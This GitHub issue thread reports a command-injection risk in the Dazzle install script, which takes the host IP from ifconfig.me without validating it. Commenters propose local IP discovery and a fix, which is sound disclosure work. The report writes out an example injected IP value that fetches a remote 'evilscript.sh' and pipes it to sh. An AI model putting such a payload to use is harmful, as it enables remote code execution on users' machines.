### ISSUE TITLE
Host install script ip discovery fragile and possibly exploitable.

### ISSUE THREAD

**Issue by pscTheOne** [hbons/SparkleShare#1595]
The dazzle.sh script uses 

``` bash
IP=`curl --silent http://ifconfig.me/ip`
```

on line 198 for setting the external ip of the host then later on line 205

``` bash
echo "      Address: ${BOLD}ssh://$DAZZLE_USER@$IP:$PORT${NORMAL}"
```

 This seems to allow for anyone who controls http://ifconfig.me or the intermediate network to code inject the script by setting IP to something like

``` bash
{{request-ip}}:22" && curl  http://ipconfig.me/evilscript.sh && sh evilscript.sh #
```

or any number of similar strings. It can be made hard to spot by checking the User Agent String to only try and exploit curl requests.
I have not tested the above but I am pretty sure a easy exploit could be crafted based on this to target your community of data privacy oriented folk.
Surly there must be a better way of getting the node ip? or even removing the info and let the experienced user input the ip of the linux host that she has root access to.

Kind Regards from a new user

**Comment by gerhard-tinned** [comment]
Well, why not just make the url configurable. There are many such servises out there. Give the user a joice ...

**Comment by cebe** [comment]
can you give me a link to the script, could not find it...

**Comment by hbons** [comment]
@cebe https://github.com/hbons/dazzle

**Comment by cebe** [comment]
Well, the thing about this information may not be correct without some interaction like opening a port on a router.
There are different setups to consider:

1. The host is available on the public internet and has a static IP address.
   In this case you can use local commands to get the IP address similar to what was suggested by @pscTheOne
2. The host is behind a NAT in which case you need an external server (STUN, ifconfig.me, or similar).

If you only want to support the first setup out of the box (which you currently do because you do not describe anything about NAT and port forwarding in the docs) you can implement this without using any external service.

**Comment by cebe** [comment]
The only problem I see with the script by @pscTheOne is that the network interface is not always eth0, somethimes it is veth0 or venet1 or simliar.

I have composed a command that should be more portable:

```sh
ip -f inet addr |grep "inet .* scope global" | grep -Po "inet ([\d+\.]+)" | cut -c 6- | head -n1
```

**Comment by cebe** [comment]
I have sent a PR with the changes necessary to fix this: https://github.com/hbons/Dazzle/pull/32
